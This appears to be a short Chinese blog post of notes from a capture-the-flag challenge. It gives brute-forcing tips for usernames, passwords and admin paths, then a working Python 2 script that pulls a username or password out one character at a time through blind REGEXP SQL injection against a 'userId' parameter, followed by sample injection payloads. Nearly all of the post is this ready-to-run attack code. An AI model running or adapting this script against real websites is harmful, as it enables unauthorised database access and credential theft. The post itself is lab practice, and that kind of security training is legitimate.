1、burp爆破用户名密码
2、id,userid,useId多试几次
3、爆破后台目录,index.php,users.php,login.php,flag.php
4、脚本:
# -*- coding:utf-8 -*-
import httplib
import re
import urllib
class Attacker:
def __init__(self, mode, url):
self.url = url
self.domin = self.get_domin()
self.mode = mode
str1 = []
for i in range(26):
str1.append(chr(ord('a') + i))
for i in range(26):
str1.append(chr(ord('A') + i))
for i in range(10):
str1.append(chr(ord('0') + i))
self.str_box = str1
def get_domin(self):
url = self.url
url_a = url.split('://')
if re.match('^http',url_a[0]):
url = url_a[1]
else:
url = url_a[0]
url_a = url.split('/')
domin = url_a[0]
return domin
def crack(self):
conn = httplib.HTTPConnection(self.domin)
if self.mode == 1:
aim = 'username'
if self.mode == 2:
aim = 'password'
url = self.url
attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'')
attack_url2 = urllib.quote('\' #')
str_box = self.str_box
try:
string = '^'
while True:
for str_end in str_box:
url_to_attack = url + attack_url1 + string + str_end + attack_url2
#print url_to_attack
conn.request(method="GET", url=url_to_attack)
response = conn.getresponse()
res = response.read()
if res.find('useless') > 0:
string = string + str_end
str_end = -1
print string[1:] #如果想看到破进程,取消此段注释
break
if str_end != -1 and str_end == '9':
break
self.name = string
print self.name[1:]
except:
print "Something Wrong"
print url
def main():
attack_url = 'http://10.200.91.28/zebCTF/users.php?userId=2'
attacker = Attacker(2, attack_url) #1为用户名注入,2为密码注入
attacker.crack()
if __name__ == '__main__':
main()正则注入
userId=2%27%20or username REGEXP '^A' %23
userId=2%27%20or username REGEXP '^a' %23
userId=2%27%20or username REGEXP '^Z' %23
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
